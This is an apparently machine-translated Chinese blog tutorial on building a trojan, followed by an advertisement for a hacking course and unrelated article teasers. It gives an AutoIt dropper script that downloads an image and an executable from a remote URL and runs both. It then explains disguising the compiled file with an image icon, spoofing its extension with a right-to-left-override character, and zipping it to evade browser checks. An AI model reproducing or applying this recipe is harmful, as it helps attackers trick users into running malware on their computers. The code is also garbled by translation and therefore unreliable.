news 2026/4/3 2:07:44

教你做一个木马病毒(非常详细),零基础入门黑客技术,收藏这一篇就够了!

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
教你做一个木马病毒(非常详细),零基础入门黑客技术,收藏这一篇就够了!
前言

特洛伊木马(或特洛伊木马)是可能感染您的计算机或移动设备的最常见和最危险的威胁类型之一。

什么是木马恶意软件?

木马恶意软件,打开时似乎是用户打开的合法文件,例如打开图像或文档或播放媒体文件,但在后台,它会运行一些邪恶的进程,例如有人可能通过后门或注入一些其他有害代码。

创建我的木马恶意软件

在这篇博客中,我将向您展示如何将我的可执行文件与图像文件结合起来,并且在打开时,它能够在目标人打开它时显示图像,但同时可执行文件在后台运行。简而言之,我将.exe文件隐藏在.jpg图像文件中。

此方法可以扩展到任何文件类型,如图像、pdf、音乐等。大多数情况下,可执行文件是病毒或用于访问目标计算机的后门。我们来看看步骤:

1. 获取图像和.exe文件的直接 URL

可执行文件.exe需要出现在公开可用的 URL 上,浏览器可以从该 URL 直接下载该可执行文件。为此,我已将可执行文件上传到 Dropbox 上。对于 dropbox,将可共享链接的末尾部分修改为dl=1将允许浏览器直接下载文件。我在下面共享的链接不包含任何代码,实际上是一个空文件,因此您可以安全地测试此链接的行为。

可执行文件的 URL.exe:https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe ?dl=1

图片的网址:

体育场馆形象

我使用了体育场馆的图像作为封面。

2. 在脚本中使用 URL
#include <StaticConstants.au3> #include <WindowsConstants.au3>本地 $urls = "url1,url2"本地 $urlsArray = StringSplit($urls, ",", 2 )对于 $url 在 $urlsArray $sFile = \_DownloadFile($url) shellExecute($sFile)下一个Func \_DownloadFile($sURL) 本地 $hDownload, $sFile $sFile = StringRegExpReplace($sURL, "^.\*/", "") $sDirectory = @TempDir & $sFile $hDownload = InetGet($sURL, $sDirectory, 17 , 1) InetClose($hDownload) 返回 $sDirectory EndFunc ;==>\_GetURLImage

在上面代码的第 3 行中,替换url1为图像的 URL 和url2可执行文件的 URL。我的最终代码如下所示

#include <StaticConstants.au3> #include <WindowsConstants.au3> 本地 $urls = " https://images.adsttc.com/media/images/5b04/5e3a/f197/cc1f/9600/00aa/newsletter/park\_garden\_concourse.jpg ,https://www.dropbox.com/s/hsnvw0ik1em0637/some\_evil\_file.exe?dl=1 " 本地 $urlsArray = StringSplit($urls, ",", 2 ) 对于 $url 在 $urlsArray $sFile = \_DownloadFile($ url) shellExecute($sFile) Next Func \_DownloadFile($sURL) 本地 $hDownload, $sFile $sFile = StringRegExpReplace($sURL, "^.\*/", "") $sDirectory = @TempDir & $sFile $hDownload = InetGet ($sURL, $sDirectory, 17, 1) InetClose($hDownload) 返回 $sDirectory EndFunc ;==>\_GetURLImage

使用扩展名保存文件.au3。我已将该文件命名为trojan.au3.

3. 为文件创建图标

由于我使用图像作为封面文件,Windows通常将图像的缩略图显示为文件图标,因此我将使用体育综合体图像作为图标并将其转换为.ico格式。你可以用谷歌搜索它,你会发现很多工具可以做到这一点。我使用这个网站 - https://cloudconvert.com/jpg-to-ico

4. 编译脚本

该脚本是用一种称为 的脚本语言编写的AutoItAutoIt要在 Ubuntu 中安装,您可以安装wine并安装AutoIt,或者如果您想要一种简单的方法,请Veil按照此处提到的步骤进行安装https://www.javatpoint.com/installing-veil。AutoIt将在其中一个步骤中进行安装,然后您可以退出安装。

打开编译 AutoIt 应用程序。该窗口应类似于下图所示的框。输入文件的位置trojan.au3和文件的路径.ico

转换后的文件在 Windows 机器上看起来像这样。

嗯,有些不对劲。该文件的问题在于其扩展名。很明显它是一个可执行文件,因为它的扩展名是.exe. 我们需要欺骗这个扩展。

5. 欺骗“.exe”扩展名到任何扩展名

为了欺骗明显的扩展名.exe并将其替换为.jpeg,我们将使用一个right-to-left-override字符。

要了解欺骗实际工作原理以及角色放置位置的详细信息right-to-left-override,请阅读博客。

欺骗文件扩展名——道德黑客
文件扩展名欺骗是创建木马时的一个方便技巧。我将把“.exe”扩展名欺骗为“.jpg”……

levelup.gitconnected.com

总结一下上面博客中提到的步骤:

文件名现在看起来像trojanexe.jpg

由于文件中包含的图像是一个体育中心的图像,因此我将trojan名称替换为sportscompl_,以便文件名显示为sports_complexe.jpg.

恭喜!!!木马已准备就绪。

现在文件名与包含的图像匹配。一些最新的浏览器在下载之前删除了从右到左的覆盖。因此,最好将文件压缩并发送出去。

学习资源

如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你

知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。


1、知识库价值

深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。

广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。

实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。

2、 部分核心内容展示

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。

1、网络安全意识

2、Linux操作系统

3、WEB架构基础与HTTP协议

4、Web渗透测试

5、渗透测试案例分享

6、渗透测试实战技巧

7、攻防对战实战

8、CTF之MISC实战讲解

3、适合学习的人群

一、基础适配人群

  1. 零基础转型者‌:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌;
  2. 开发/运维人员‌:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展‌或者转行就业;
  3. 应届毕业生‌:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期‌;

二、能力提升适配

1、‌技术爱好者‌:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌;

2、安全从业者‌:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌;

3、‌合规需求者‌:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员‌;

因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/29 0:50:17

漏洞分析 | 经典的Shiro反序列化

0x01、前言 相信大家总是面试会问到java反序列化&#xff0c;或者会问到标志性的漏洞&#xff0c;比如shiro反序列化&#xff0c;或者weblogic反序列化漏洞。 那我就这篇文章为大家讲解一下&#xff0c;不懂的哥哥直接背一下&#xff0c;理解一下就好了。 至于为什么要选择sh…

作者头像 李华
网站建设 2026/3/15 0:46:21

Nodejs和vue框架的家政保洁预约系统 角色多

文章目录家政保洁预约系统摘要--nodejs技术栈--结论源码文档获取/同行可拿货,招校园代理 &#xff1a;文章底部获取博主联系方式&#xff01;家政保洁预约系统摘要 基于Node.js和Vue框架开发的家政保洁预约系统&#xff0c;采用前后端分离架构&#xff0c;具备多角色协同管理功…

作者头像 李华
网站建设 2026/3/28 4:32:29

Nodejs和vue框架的旅游民宿营销系统

文章目录旅游民宿营销系统摘要--nodejs技术栈--结论源码文档获取/同行可拿货,招校园代理 &#xff1a;文章底部获取博主联系方式&#xff01;旅游民宿营销系统摘要 该系统基于Node.js与Vue.js框架开发&#xff0c;旨在为旅游民宿行业提供高效的数字化营销解决方案。通过前后端…

作者头像 李华
网站建设 2026/4/1 19:48:53

QM系列闪测仪效率革新 实现鼠标产品高品质人机交互

​在消费电子领域&#xff0c;鼠标作为高频率、高精度的直接人机交互界面&#xff0c;其产品品质直接决定了用户体验与品牌声誉。对于鼠标制造而言&#xff0c;从精密注塑、橡胶硫化到最终组装&#xff0c;每一个环节的尺寸与形位公差控制都至关重要。一、为何必须对鼠标核心部…

作者头像 李华
网站建设 2026/3/27 3:38:44

混沌实验设计:真实场景模拟——软件测试从业者的实战指南

混沌工程与真实场景模拟的融合 在当今高度分布式的软件系统中&#xff0c;系统故障已成为常态而非例外。作为软件测试从业者&#xff0c;您肩负着确保应用韧性的重任。混沌工程&#xff08;Chaos Engineering&#xff09;通过主动注入故障来暴露系统弱点&#xff0c;已成为提升…

作者头像 李华
网站建设 2026/3/26 17:26:00

真实用车场景的考验:谁来承接智能座舱的未来?

逛完CES 2026展&#xff0c;本以为炫酷车身设计会是最大亮点&#xff0c;结果智能座舱的交互系统直接“杀疯”&#xff01;一坐进展车&#xff0c;我瞬间对车载语音助手改观。无需生硬喊唤醒词&#xff0c;随口下达连续指令&#xff0c;像“开主驾空调、调副驾温至24度”&#…

作者头像 李华